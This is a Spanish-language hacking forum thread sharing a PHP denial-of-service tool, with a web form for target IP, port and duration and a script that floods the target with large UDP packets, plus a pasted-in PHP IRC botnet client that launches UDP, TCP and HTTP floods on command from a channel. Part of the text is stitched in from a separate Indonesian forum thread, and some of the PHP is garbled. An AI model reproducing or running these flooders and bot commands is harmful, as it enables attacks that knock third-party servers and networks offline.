Underc0de

Programación Web => Back-end => Mensaje iniciado por: J0k3$ en Mayo 07, 2013, 06:53:11 PM

Título: Codigo de PHP DOS
Publicado por: J0k3$ en Mayo 07, 2013, 06:53:11 PM
(http://4.bp.blogspot.com/-pgblKYr7CLY/UKRiMdUosBI/AAAAAAAADmo/7NvVAP5Dico/s320/ddos.png)
Bueno amigos! vi que Root_Shell subio el bonito PHP DOS ! y yo navegando como un poceso solamente para conseguiros el code ! lo encontre por hay ustedes saben xD :) bueno salu2

<?php
        $ip 
$_SERVER['REMOTE_ADDR'];
        
?>


        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
        <html>

        <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">

            <title>PHP DoS, Coded by EXE</title>
        </head>
        <!-- PHP DOS, coded by EXE -->
        <style type="text/css">
        <!--
        body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
        }



        -->
        </style>
        <!-- PHP DOS, coded by EXE -->
        <body>
        <center><br><br>
        <img src="main.jpg"><br>
        <b>Your IP:</b> <font color="red"><?php echo $ip?></font>&nbsp;(Don't DoS yourself nub)<br><br>
        <form name="input" action="function.php" method="post">
        IP:
        <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Time:
        <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Port:
        <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
        <br><br>
        <input type="submit" value="    Start the Attack--->    ">
        <br><br>
        <center>
        After initiating the DoS attack, please wait while the browser loads.
        </center>

        </form>
        </center>
        <!-- PHP DOS, coded by EXE -->
        </body>
        </html>


        funtion.php

        Code:

        <?php

        
//=================================================
        //PHP DOS v1.8 (Possibly Stronger Flood Strength)
        //Coded by EXE
        //www.ZeroDayExile.com
        //=================================================

        
$packets 0;
        
$ip $_POST['ip'];
        
$rand $_POST['port'];
        
set_time_limit(0);
        
ignore_user_abort(FALSE);

        
$exec_time $_POST['time'];

        
$time time();
        print 
"Flooded: $ip on port $rand <br><br>";
        
$max_time $time+$exec_time;



        for(
$i=0;$i<65535;$i++){
                
$out .= "X";
        }
        while(
1){
        
$packets++;
                if(
time() > $max_time){
                        break;
                }
                
                
$fp fsockopen("udp://$ip"$rand$errno$errstr5);
                if(
$fp){
                        
fwrite($fp$out);
                        
fclose($fp);
                }
        }
        echo 
"Packet complete at ".time('h:i:s')." with $packets (" round(($packets*65)/10242) . " mB) packets averaging "round($packets/$exec_time2) . " packets/s \n";
        
?>


    Reply With Quote Reply With Quote
    11-15-2009, 12:30 PM #3
    z0mb13
    z0mb13 is offline
    Senior
    z0mb13's Avatar

    Join Date
        Nov 2009
    Posts
        252
    Total 'Thanks' Received by This User :
    0 For This Post
    1 Total

    Send a message via Yahoo to z0mb13

        maisih suka di pake dgn gw,v3n0m,edelweiss,aRiee,lingah itu kok

        dan hasil'a lumayan memuaskan

    Reply With Quote Reply With Quote
    11-15-2009, 12:34 PM #4
    alex_owners
    alex_owners is offline
    Junior Member
    alex_owners's Avatar

    Join Date
        Nov 2009
    Posts
        83
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Send a message via Yahoo to alex_owners
    PHP Ddos BOT

        izin d plajarin duluya k
        manatau pandai, hehe

    Reply With Quote Reply With Quote
    11-16-2009, 10:28 AM #5
    zuchri
    zuchri is offline
    Junior Member
    zuchri's Avatar

    Join Date
        Nov 2009
    Posts
        2
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Talking

        Quote Originally Posted by z0mb13 View Post
        Code:

        <?php


        
/*


        PHP DDoS Bot
        Version 1.0
        [www.~censored~.org]


        */


        
$server="1.3.3.7";
        
$Port="6667";
        
$nick="bot-";$willekeurig;
        
$willekeurig=mt_rand(0,3);
        
$nicknummer=mt_rand(100000,999999);
        
$Channel="#WauShare";
        
$Channelpass="ddos";
        
$msg="Farewell.";

        
set_time_limit(0);
        
$loop 0$verbonden 0;
        
$verbinden fsockopen($server$Port);

        while (
$read fgets($verbinden,512)) {

        
$read str_replace("\n","",$read); $read str_replace("\r","",$read);
        
$read2 explode(" ",$read);

        if (
$loop == 0) {
        
fputs($verbinden,"nick $nick$nicknummer\n\n");
        
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
        }

        if (
$read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

        if (
$read2[1] == 251) {
        
fputs($verbinden,"join $Channel $Channelpass\n");
        
$verbonden++;
        }


        if (
eregi("bot-op",$read)) {
        
fputs($verbinden,"mode $Channel +o $read2[4]\n");
        }


        if (
eregi("bot-deop",$read)) {
        
fputs($verbinden,"mode $Channel -o $read2[4]\n");
        }

        if (
eregi("bot-quit",$read)) {
        
fputs($verbinden,"quit :$msg\n\n");
        break;
        }

        if (
eregi("bot-join",$read)) {
        
fputs($verbinden,"join $read2[4]\n");
        }

        if (
eregi("bot-part",$read)) {
        
fputs($verbinden,"part $read2[4]\n");
        }


        if (
eregi("ddos-udp",$read)) {
        
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        
$fp fsockopen("udp://$read2[4]"500$errno$errstr30);
        if (!
$fp)
        {
        
//echo "$errstr ($errno)<br>\n"; //troep
        
exit;
        }
        else
        {
        
$char "a";
        for(
$a 0$a 9999999999999$a++)
        
$data $data.$char;

        if(
fputs ($fp$data) )
        
fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
        else
        
fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
        }

        if (
eregi("ddos-tcp",$read)) {
        
fputs($verbinden,"part $read2[4]\n");
        
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        
$server $read2[4];
        
$Port $read2[5];

        for(
$sockets 0$sockets $read2[6]; $sockets++)
        {
        
$verbinden fsockopen($server$Port);
        }
        }

        if (
eregi("ddos-http",$read)) {
        
fputs($verbinden,"part $read2[4]\n");
        
fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        
$Webserver $read2[4];
        
$Port $read2[5];

        
$Aanvraag "GET / HTTP/1.1\r\n";
        
$Aanvraag .= "Accept: */*\r\n";
        
$Aanvraag .= "Accept-Language: nl\r\n";
        
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        
$Aanvraag .= "Host: $read2[4]\r\n";
        
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

        for(
$Aantal 0$Aantal $read2[6]; $Aantal++)
        {
        
$DoS fsockopen($Webserver$Port);
        
fwrite($DoS$Aanvraag);
        
fclose($DoS);
        }
        }
        
$loop++;

        }
        
?>
Título: Re:Codigo de PHP DOS
Publicado por: s3cur1tyr00t en Mayo 17, 2013, 01:35:00 AM
Es un ataque udp incapaz de dañar demasiado.

Por otro lado, creo que te falta un archivo: <form name="input" action="function.php" method="post">

Saludos,
Título: Re:Codigo de PHP DOS
Publicado por: Prospero en Junio 04, 2013, 01:59:11 PM

http://www.4shared.com/rar/sSqhvPGq/PHPDoSv18ZeroDayExilecom.html (http://www.4shared.com/rar/sSqhvPGq/PHPDoSv18ZeroDayExilecom.html)

se los dejo completo  8)
Título: Re:Codigo de PHP DOS
Publicado por: MegaBedder en Agosto 11, 2013, 11:48:57 PM
Nose, pero como que no revisa, hay abajo esta el bloque de funcion.php
Título: Re:Codigo de PHP DOS
Publicado por: blackdrake en Agosto 13, 2013, 07:16:54 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

http://www.4shared.com/rar/sSqhvPGq/PHPDoSv18ZeroDayExilecom.html (http://www.4shared.com/rar/sSqhvPGq/PHPDoSv18ZeroDayExilecom.html)

se los dejo completo  8)

Está dañado....

Un saludo.